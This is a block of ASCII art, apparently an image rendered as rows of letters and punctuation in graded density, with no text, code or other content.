MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0OOOkkkkkkkooO00KXXKKK0xl;'.......''',,:oO00xlcclx0XXXXXXXKKKKKKKKKK000OOOOkkkOOOOOOOkkkkxddooodoooolccc::ok0000Odoc;,'.....,:okKXXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0OOkkkxxkkxldOO0KKKKKK0kdl,......'.....':okOkdood0XNNNNNNNNNNNNNNNNNNNWWWWWWWWNNNNNNNNNNNXXXXXXXXXK0koloolokkxxxdcc:,'.....';cdOXNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0kOkkkxxxkxldOO0KKKKKK0KOd:.............';cddxxxOKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNX0doooxxxxoolc:;;,'....';;:xKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0kkkxkxxxkdldkO0KKKKKKKKKkc,'.............,cloodkKXNNNNNNNNNNNNNNNNNXXXXXXXKKXXNNNNNNNNNNNNNXXXXNNNNKOdloxxxdol:,,,;,''..,:;;l0XNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0kkxxkxxxxolxkO0KKKKKKKKK0o;,..............,:cllx0XNNNNNNNXXXXXXXXXXKKKK000000KKKXXXXXXXXXXXXXXXXNNXXKOxoodolc;,''',,'...,c;cOXNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0kkxxxkxxxllxkO0KKKKKKKKKXkc,'.............',;clok0XNNNNNNNXXXXXXXXKKK0OkddxxxkOO00KKKKXXXXXXXXXXXNXXK0kdlll:,,,'..'....'',ckKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0kxxxxxxxxlokkO0KKKKKKXXXXKkc;'.............',;:lokKXNNWNNNNNNNXXXKKK0kxdoooooddxO000KKXXXXXXXXXXXNXK0kxolc:,'''........',:d0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0kkxxxxxxxlokkO0KKKKKKXXXXX0d:,'.............';:cox0KNNWNNNNNNNNXXK00Okdoddoooddxk0KKKXXXXXXXXXXXXXXKOdolc:;,''........',:cxXNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0kkkxxxxxdldkkO0KKKKKXXXNXK0koc,.............',,:ldkOXNNWWWWWWWNNXK0000Oxdddddxxxk0KXXXNXXXXXXXXXXK0kdl::;,''..........,:ld0NNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0xxkxxxxkdlxkO0KKKKKKXXXNXXXX0xc'............'',:coxkOKKXNNNNNNNXKXXXXXKK000OkOOOOKXXXXNNNNNNNXXKK0kxoc:;,''...........':xKXNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0xxdxxxxxooxkO0KKKKKKXXXXXXXXKkc;'...........',,;:ldxkkO0XXXXNNNXXXNNNNNNNNNNXKKKKXXXXXNNNNNNXXK0Oxolcc:;,'''........'',lkXNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxxdxxxxxooxkO0KKKKKKXXXXXXXXKkloo;..'........'',;clodddk0KKKXXKXNNNNNNNNNNNNNNXXXXXNXXNNNNNXX0Okdolc;;;,'............,cx0NNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxxxkxxxdodkkO0KKKKKKXXXXXXXXK0kkkd;...........'',::::coxkOOOOKKXNNNNXXNNNNWWWNNXXKKXXXXXXXXKKOxolc::;,''.........,',;cdONWWWNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOdxxxxxxdodkkOKKKKKKKXXXXXXXKKXXKOx:,,.........''',,,,;cdxkkdxOKKKKXX00KXXNNNNNXKKKO000OOO000Oxdc:::;,''..........';oddkKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0xxxxdxxooxkk0KKKKKKKXXXXXXXXXXXKOxlc:'..........'''',,;clooddxkOOOO0OkOKXXNXKXX0Okxkkkkkkkxxdoc;;;;,'...........',:ox0NNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWOxxxxxxdooxkO0KKKKKKXXXXXXXXXXXXXX0xdl;................,:::clllodxkxddxkOOO0KOO0kdxxxkxxxxdoolc;,,,''...........;:lk0KXNWNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxkkkxddodkkO0KKKKKKXXXXXXXXXXNXXXKKKxc;'..............';;;::;;cclodoolooodxxddooloodddddlccc:,'',,'...........';co0XNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxkxxxddodkkO0KKKKKKKKXXXXXXXXNNX0occ:lo:...............'',;;,,;:;:c:;,;:::::ccccccclllc:;;;;'..','............''.'ckXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxxxxxdooxkk000kxdlc:clkKXXK0Okdc,...:ddl;'................','';;,,,'...''''',;;;;;;;,,,,,'''.''''..........'';c,...,lONWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOddxkxdooxkxdoc;,,''''',clc;,''.....'okkko;,,...............'....,,.......'.','''''''''''.....'............',;lxc...'';oKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxxxkkdoddl:;;;;,,,,,''............'o00Oxocc:'...................,'......'..''....',,,'...................';cldkl'...'',l0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOoooddolc;;;;,,,'''''''....'......'o0K0Okxdl:::,''...............................'''''..................',:ldxkkc.....'',lOXNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNd;;;;;;,,,;;,,,,,,,,'''...........oKK00000Oxxkxc;,.............................'''................''',;:clooxkko,.....',,;:cldOXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl,,',,,,,,,,,,,,,,,;,,'..........c0XKKKKXKKKK0kdoc;;;''..........................................',;:loddxkxkkd;.......'',;;'.':lxKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl',,''',,,,,;;;;,,,,,,;,'.......;kXKKXXXXXXXKK0Okkxxoc;;,'....................................',,::codxkkkkkkd:.........'',,'.''',:ox0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl,,,,',,,,,;,,,,,'''',,,'......'dKXXKXXXXXXXXXKKKKKOxooc;,''','''.............'.........'..'',;:coooxkkkkkkkd:....''''.''',,'.'''',;;:okKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl,;,'''',,;;;,,,,,,,,,,,'......;OXXXXXXXXXXXXXXXXKK0OOOxoccc::;;,,,'....,,''''..'''...'''',:c:clodxkkkOOkkko;.....''''''''',,'''',,,,;::cdOXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl,,''''';;;;;;;;;;;;;,;;,.......cOXXXXXXXXXXXXXXXXKKK00Okxddolllc::,,,'';:;;,,',;,,,,,,,,:llloodxxkOOOOOkdc,......''',,'''',,,,',,,;;;:c::coOXWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNo,,,,,,,;;;;;,,,;;;;,,;,,'.......:kXXXXXXXXXXXXXXXXXKK00OOkxxddololc:::::::::::ccccccccclododdxkkkOOOOkdc,'...''''''',,''''',,,,,,;;;;:c:;::cokKWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNo',,,;;;,,,,;;;,;;;;,;;,,'........,oKXXXXXXXXXXXXXXXXKKK00OkkxdddddoooolllllllllllloooddddddxxkkkOOOkd:,''''''.'''''',',''',,,;,,;;;;;:::::::ccdXWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNo,,,;;;,;;;;;:;,;;,',,,;,'''........cOXXXNNNNXXXXXXXXXXKKK00OOkkkkxxxddddddooooooodddxddddxxkkkkOOko:'.''''''''',,'''','''',:;;;;::::;;;:cc:cclxNWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo;;:;:;;;::;;;;,,,,,,,'''',,'........,o0XXNNNNNXXXXXXXXXXKKKK00OOOOkkkxxxxxxdddddxxxxkxxxkkkkOOOko:,'.'''''''''''',,,''''',,;;;;::;,;;;;:::::cxXWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl;;,,,;;;;;;:;;;;,,,,''',;;;,'....''...;d0NNNNNNXXXXXXXXXXXKKKKK0000OOOOkkkkkkkkkkkkkkkkkkOOOxol;'.''''''''...',,,,,,,''',,,,,;;;;;;:;,,,;;;;ckXNWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl,,,,',;;;:;;,;,',,,;;;;;;;,'''....'''...;oOXNNNNXXXXNXXXXXXXKKKKKK00000OOOOOOOOOOkkkkOOOkxo:;''''''''''''''',,,,,,,,',,,,,,',;;,,,,'''''',,,',:odxOKXNWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXc''',,,:;;;,,,',,,;;;,;::;;;,,,'....','....,lkKNNNNNNNNNXXXXXXKKKKKKKK0000000000OOOOOOkdl:,'',,,''',''''''',,;,,,;,,,',,;;,,;;;,'''....'''',,,,;;::clodkOKNWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:.',;;,,,;,;;,'',,,;::::::;,,;;,'....''''''..':oOKNNNNNNNXXXXXXXKKKKKKKK000000000Okdlc:,'''''''''',''','',,,;;;;;;,'';;;;;,,,''......''''''';;;;:::::cc:cldk0XWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:..';;,',,,,',,,;;;;:::,,,,,,;;,,'....'''''''''.':oOXNNNNNNNXXXXXXXXXXXXXKKKKKK0xl;,',,,,',,''''',,,,,,,,,;,;;;;;;,''',;,'''',,,''''''','',,;:;;:::::::::;:ccdOKXNWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:....'',,,',,,;,;::::,,''';;,,,,,,,'.'''',',,''''''':oOKNNNNNNNXXXXXXXXXXXXXKOdc,''',,,,,'''''',,,,;;,,,,;;,;::;::,,,'''',,,,;;;,'''',;;;;;;;::;;;:cc::::::::llldkO00KXNNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXc......',,,;;,,,',;;,,,,'';:;;;,;::,''''',',,'',,,'''.':okKNNNNNNNXXXXXXXX0dl;,,,,,''''''''''',,,,,;;;,,,;,;::::c:,'''',;;;;:;;;,',;;;:,;;;;;:::::::;;;;:cc:ccccclooddxkk0WMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXc........',;;;;,''',,;;;;,,;,,,;:c:,,''''',,,,;,,,,,,''''':okKXNNNNNNXX0xl;,,,,'''''''''''''''''''',;;,,;;;;;:::c;''',;;:::::;,'',;::;;,;;;;;;;;;;;;,;;;:;:::;::::ccllcllxNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl'''......'',,,'','',,;::,,,,',,;::;,;;'',,,;,,;;,,,,,,,,'''';lx0XNX0dlc,',,''''''''''''''''''',,,,,,,'',;;;;:;:c;',,,,;;:;::,'',;;;;;,;;:::::;;;;;;;:;::;;;;:ccllcccc:::oXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl',,'.......',;;,,,,;;;::;,,;;,;;;;;;;:,'''',,,,;,,,,,,,,,'''''';ldo:;;;,'''''''''',''''''''',,,''',,,'',;:;:::::;,,,;;;;;;;,'',,;;;;;;;:::cccc:;::cc:::::;;:::cccc:cc:c:oXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl,''''''......,;;;,,;;;;;,,,;;,,;;;;:c:;,''',,,',,,,,;;,,,,,,'',,;;;,,,''''''''''''''''',,,,',,''',,,''',;:::ccc:;,,;,,,,,,'',,;;;;;;:cc:;::::c:;:cclc:;;::::c::ccccccclcdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo,',,;;''''....'',;'',;;,',,;;,;c:;;;:;;;;;,'',,',,;;;,;;,,,;;,,;,,''''''''',,,,'',''''''''''''''''',,'',;;:;:ccl:,,,,'''',,,;::;;;;::cc:::;::cccc:::::::::::cccclccc:cccxNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXc',,,;:,,,,,'''..'''',,',,,;:;,;;,;,,;::;;;;,''','',,,,,;;;,;;;;;;,'''','',''',,,,,,,,,,'','''',,,,,;;,;;;:c::;co:'''',,;;;;;;;,,;;::::::c:::c::cc:;:::cc:::cccccclccccccdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl,;;,,;;,,;,',''..''''',;,,::;'.';,'',::;::::;,,',,,,;;,;;;;;;;;;;;,,,,,,','',,,,,;,,,,,,,,,;;;;;;;;;,,,:ccccccc:;',,,;;:::::;;;;:c:::;;:::::c:::c::;;::::;;:cc::::::ccccdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXl,;,,,;c::c:;;,'..'..'',;,,;,'',;:;,',;;;;;;;;:;,,,,,::;;,,,;;;,,::;;;,;;,,,,,,,,,,,,,;;;,,;:;;;;,,,,''';c:c::ccc:,,;;;;;;;:::;;::c::c::::cc:;;::::::::c:;;;:c::::c::::ccdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo,;;;;;:;;::;;,,'''''''',',,,,,;;:c;''',,,;;;;;;;::;,,;;;;;;;::;,;;;:;;;;;;;;;,,,,,,,,,,;;;;;;,,''',,,,,;;;:::cll:;,;;;;;;c:;:::;::::c::c:cc:::::;::::;:cc::::::ccc:c::::oXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo;;;;::::;;;;;;;;;;,,'''''',,;;,,:l:''''',,,;;;;;::;;:c::;;,;;;;;;;::;;;::;;;;;;;;:;;;;;::;;;;;;;;;;;;;;;;:::::ll:,,;;:c::c::clc::::::::ccccc:;;:::::::cclclc::::::::ccccdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXd:c:;;:;;:;;;::::;;;,,,,''',,,,;;:l:,'',,,''',,;::::;;:;;;;;;;;;;;::;:::c:;;;::::;;;:::;;:::::::c:;;;;;;::cc::::c:;;;;;::c::cc:::ccc::::ccc:clc:::::::::clccc::::;:ccccccxNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo:::;,;;;;;:cclc:;;;;,,,''''''',,;c:,''',,''',,,,,,;;,;;;;;;;;;::;;;;;:;:;;;;;;;,;;;;:;;;;:;::::::::;:;,:ccc::;:::;;;;;:cc::cc:::ccc::lccccccc::ccc::;:::ccc:::::cc::::::dXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXdclc:,,;:;;;;;c:;;;:::;;,;,,'''',,;:;'.'''''''''''',,,,,,;;;;::::;;;;,;,,,,,,,,,,,,,;;;;;;;:::;;::::::;;::c::::cl:;;;;:::::::cccccc::ccccllc:::c::cc:cc:::;:c::cccc:::clcdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo:lcc;;::;::;;:;;;:::ccc;;,,,''',,;:;'''''''''''''''''''',,'',,,,,,,,,,,,,,''','',,,,;;;;;;;;;;;;;;;;:;;:c::cc:cc:;;;;cccc::::cccclccc:::ccccccc::cc:cccc::clc::ccc:lllc:oXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo:::ccc:;;::,;:;;::;;;;;;,,,,,,,,;cc;,''''''''''''''''''''''''''''''''''''''',,,,,;;;;;;;;;;;;;;;;;;;;;;::::ccccc:;;;;:c:::ccccc:::c:ccccccccccccccc:::cccccc:cclccccllc:dXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXd:;;ccc:::::;:c:;;;::;;,,,,,,;;;;:lc;,,',,''''''''''''''''''''''''''''''''',,,,,,,,,,,,,,,,,;;;::cc::;;:ccc::::::;;;;:::ccc::cccccccccc:cclccccllcclc::::cc:::cllcclcccccdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXd:;;;;;;::;:::;;;:;;;::;,,;;;:;,;ccc;,,,,,,,,,,,,;,,,,,,,,,,,,,,,'',,,,,,,,,,,;;,,,;,,,;;;;;::::ccccc:;:cc:cccccc;;::::::::c::clcccclcccclcc:::ccc:ccccclcccccccccloolcccdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
